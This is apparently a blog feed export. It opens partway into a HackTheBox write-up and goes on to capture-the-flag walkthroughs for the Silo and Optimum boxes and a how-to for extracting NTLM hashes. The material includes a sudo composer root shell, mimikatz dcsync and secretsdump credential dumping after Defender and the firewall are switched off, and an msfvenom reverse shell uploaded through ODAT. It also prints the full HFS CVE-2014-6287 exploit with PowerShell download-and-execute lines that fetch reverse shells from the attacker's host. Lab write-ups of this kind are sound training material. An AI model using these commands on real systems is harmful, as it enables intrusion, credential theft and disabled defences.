    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

On GTFOBins I found an entry for the composer to escelate to root.

$ TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n: 
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

SHELL: root


Thanks for reading! I hope you enjoyed it!

]]>
[How-To] Extract NTLM hash https://qwertty.info/blog/how-to-extract-ntlm-hash 2020-12-19T20:09:00+01:00 2020-12-19T20:09:00+01:00

Preface: If you want to decrypt a writeup for an active windows box on HTB or from other plattforms using the NTLM hash of the administartor user, you are on the right place. In this How-To post I will show you how you can extract the NTLM hash of the administrator user (probably for any user) on windows machines.

At first we will usemimikatz. In the second example I show you how to use secretdump for it.

Using mimikatz

After getting a shell as administrator you can follow the steps below to extract the NTLM hash.

First disable the real time protection if its enabled:

Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Anti-Virus protection:

netsh advfirewall set  currentprofile state off

Then run mimikatz with the following arguments:

./mimikatz.exe "lsadump::dcsync /user:administrator"

You will get an output like this:

C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff. Just copy paste it in the writeup where it is asked for.

Using Secretdump

If you have owned a machine and you have the password of the user administrator, you can get the NTLM hash using secrectdump. Secretdump is a tool from impacket-tools.

secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::

The hash is divided into two sections, first the LM hash and second one is NTLM.

Here we got the NTLM hash which is d9485863c1b9e07543aa40cbb4ab9dfd. Just copy paste it in the writeup where it is asked for.

]]>
[HTB] Silo - Writeup https://qwertty.info/blog/htb-silo-writeup 2020-12-15T08:21:00+01:00 2020-12-15T08:21:00+01:00

Preface: Silo is a medium box on HackTheBox.eu. With an basic nmap scan we will find a bunch of open ports. But the most interesting one is the port 1521. There is a "Oracle TNS listener" running on it. After some enumeration I found an CVE for the service. With ODAT we are able to discover further informations which enable us to upload and execute files. We will upload and execute our own reverse shell and get directly the administrator shell. Hack the box infocard silo

Information gathering

As always we start with an nmap scan for open ports and services:

$ sudo nmap -sC -sV -oN nmap/silo.nmap 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:33 CET
Nmap scan report for 10.10.10.82
Host is up (0.14s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 9m31s, deviation: 0s, median: 9m30s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-13T18:45:21
|_  start_date: 2021-02-13T18:42:18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.61 seconds

We get a bunch of ports but the most interesting one is 1521. Because there runs a Oracle TNS listener service which allows unauthorized access. After a bit enumeration on google I found the CVE-2012-1675. Which is a "TNS Listener Poison Attack". I also found a nmap script oracle-tns-poison.nse to verify the vulnerability.

So let's verify it the box is vulnerable to the CVE-2012-1675. First we clone the GitHub repo and change our directory to it:

$ git clone https://github.com/bongbongco/CVE-2012-1675.git 
$ cd CVE-2012-1675

Now we can verify it. There is also a example in the README.md.

$ nmap -Pn -sT --script=./oracle-tns-poison -p 1521 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:51 CET
NSE: DEPRECATION WARNING: bin.lua is deprecated. Please use Lua 5.3 string.pack
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.23s latency).

PORT     STATE SERVICE
1521/tcp open  oracle
|_oracle-tns-poison: Host is vulnerable!

Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Awesome! The host is vulnerable so we can use it.

Exploitation

We discovered the vulnerability of the box. No we have to search for an existing exploit or tool that we can use for our case. After a while I found the ODAT (Oracle Database Attacking Tool). In the README.md I found a module for our CVE-2012-1675. So let's try this tool.

First we have to clone the repo and change our directory to it:

$ git clone https://github.com/quentinhardy/odat.git
$ cd odat

Now we can try the tnspoison module:

$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.

But we need the server SID. Let's see how we can discover it.

The help menu of odat.py show's us a module sidguesser. I think this is what we need.

$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...      
###############################################################################################################  | ETA:  00:00:00 
100% |###########################################################################################################| Time: 00:01:30 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...              ##############################################################################                   | ETA:  00:00:08 
100% |###########################################################################################################| Time: 00:01:13 
[+] SIDs found on the 10.10.10.82:1521 server: XE

And we got our SID: XE

Now we can test again the tnspoison module. I always try to verify the vulnerability before I ran into a rabbit hole.

$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-modul
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

Yes, it works. In the help menu of odat.py I saw the module passwordguesser. Maybe we can extract some credentials. Because we got the SID. This is mostly always required for the modules.

$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

Awesome! We found some valid credentials. So maybe we are able to upload our reverse shell. There is a module named utlfile. With this we can upload/download/delete files. But first we have to create our reverse shell.

I will use msfvenom for it:

$ msfvenom -p windows/x64/shell_reverse_tcp  LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe

Now we can upload it with the odat.py

$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file

Nice, the file was created on the box.

No let's start our nc listener on port 4444

$ nc -lvnp 4444

Now we can use the module externaltable. It took me a while to discover this module because it is not an obvious name for what we was looking for. But the description says what we want:

to read files or to execute system commands/scripts

Let's try it:

$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path

Hopefully we got the reverse shell. Let's check our nc listener:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>

Nice! We got the shell. Now we can grab the user and root flag.

SHELL: nt authority\system


Thanks for reading! I hope you enjoyed it!

]]>
[HTB] Optimum - Writeup https://qwertty.info/blog/htb-optimum-writeup 2020-11-19T08:21:00+01:00 2020-11-19T08:21:00+01:00

Preface: Optimum is a easy box on HackTheBox.eu. With an basic nmap scan we will find only one open http port. On this port is running a service which we are going to exploit. After some information gathering we found a RCE vulnerability on the service which we take leverage of to gain a reverse shell. Once on the box we used watson to check if there is a possible CVE for us. And there is one. With this CVE we are able to gain the administrator shell. Hack the box infocard optimum

Information gathering

As always we start with an nmap scan for open ports and services:

$ sudo nmap -sC -sV -oN nmap/optimum.nmap 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-16 07:41 CET
Nmap scan report for 10.10.10.8
Host is up (0.039s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds

We got http on port 80. According to nmap we got the HttpFileServer service in the version 2.3 which runs on it.

Before we take a look for common vulnerabilities on the service we start gobuster on the IP. I like to have some enumeration in the background.

$ gobuster dir -o gobuster/optimum.txt -u 10.10.10.0 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt

First we try searchsploit. Maybe we found something there.

$ searchsploit httpfileserver
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                                                   | windows/webapps/49125.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

There is a known RCE for the HttpFileServer. Luckily for the version which is currently running.

Let's take a look on the python script with the -x option from searchsploit.

# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: <C3><93>scar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3

# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
        http = urllib3.PoolManager()    
        url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
        print(url)
        response = http.request('GET', url)

except Exception as ex:
        print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
        print(ex)

Okay, this is the CVE-2014-6287 but luckily the date of the script is 28-11-2020. I think we can use it.

Let's copy it to our current directory with the -m option from searchsploit. As the script says we have to specify the RHOST, RPORT and the COMMAND. I always check first if this is going to work for my situation. So first try to download a random file from my local python http-server to see if we got command execution.

$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/qwertty.txt')"

Yes, we got code execution. As we see below we got some 404 on my requested file.

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -

Before we go deeper with this exploit, I checked my gobusterwhich was running in the background. But it found nothing interesting. We can go further with our exploit.

Foothold / User

Now we know how to exploit our target. So we can go on with our CVE-2014-6287.

With powershellwe are able to download a .ps1 file and execute it directly. Like below:

# IEX = Invoke Expression
IEX (New-Object Net.WebClient).DownloadString('<URL>')

So first we download a powershell reverse-shell from nishang. We have to add the line below to the end of the .ps1 file.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4444

The reason is simple: this line invoke our reverse shell to our listener.

Now we can modify our previous exploit call to download our reverse shell. I downloaded the file to my current directory and renamed it to qwertty.ps1. Then I restart our python http.server and start my nc listener on port 4444. Now we can call our exploit again.

$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/qwertty.ps1')"

Hopefully we got now a reverse shell.

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKOWN) [10.10.10.8] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami
optimum\kostas

Yep, there it is :)

SHELL: optimum\kostas

Root

As always let's run winpeas.exe on this box.

First start my python http.server.

$ python3 -m http.server

Then download it to the box and run it.

PS C:\Users\kostas\Desktop> Invoke-WebRequest http://10.10.14.3:8000/winpeas.exe -Outfile c:\Users\kostas\Desktop\winpeas.exe
PS C:\Users\kostas\Desktop> .\winpeas.exe

But winpeas shows nothing interessting.

Let's try watson. It is a exploit suggestor for privilege escalation. You can find it here.

PS C:\Users\kostas\Desktop> Invoke-WebRequest http://10.10.14.3:8000/Watson.exe -Outfile c:\Users\kostas\Desktop\watson.exe
PS C:\Users\kostas\Desktop> .\watson.exe
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|

                           v0.1    

                  Sherlock sucks...
                   @_RastaMouse

 [*] OS Build number: 9600
 [*] CPU Address Width: 64
 [*] Processs IntPtr Size: 8
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS15-051
   [>] Description: An EoP exists due to improper object handling in the win32k.sys kernel mode driver.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS15-076
   [>] Description: Local DCOM DCE/RPC connections can be reflected back to a listening TCP socket allowing access to an NTLM authentication challenge for LocalSystem, which can be replayed to the local DCOM activation service to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/37768/
   [>] Notes: None.

  [*] Appears vulnerable to MS15-078
   [>] Description: An EoP exists due to a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS16-032
   [>] Description: An EoP exists due to a lack of sanitization of standard handles in Windows' Secondary Logon Service.
   [>] Exploit: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
   [>] Notes: None.

  [*] Appears vulnerable to MS16-034
   [>] Description: An EoP exist when the Windows kernel-mode driver fails to properly handle objects in memory.
   [>] Exploit: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)

Let's try the MS16-032 first. After some enumeration if found this link. It has a custom parameter where we can define what should be called with the administrator shell.

So I decide to download my administrator reverse shell with IEX. Let's add the following line at the bottom from the exploit:

Invoke-MS16-032 "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3:8000/system.ps1')"

For the administrator reverse shell I used the same from above. But copied to system.ps1 and changed the listener port to 4445.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4445

Before we execute our exploit we have to start another nc listener on port 4445.

$ nc -lvnp 4445

Now we are ready to run the exploit:

PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3:8000/MS16-032.ps1")

On our python http.server we see the two GET requests. So it looks like we have done everything correct.

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.8 - - [18/Feb/2021 20:56:36] "GET /MS16-032.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [18/Feb/2021 20:56:43] "GET /system.ps1 HTTP/1.1" 200 -

So now it is time to check our nc listener.

$ nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.8] 49209
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system
PS C:\Users\kostas\Desktop> 

Yes! We got a reverse shell as nt authority\system. Now we can grab the root flag.

SHELL: nt authority\system


Thanks for reading! I hope you enjoyed it!

]]>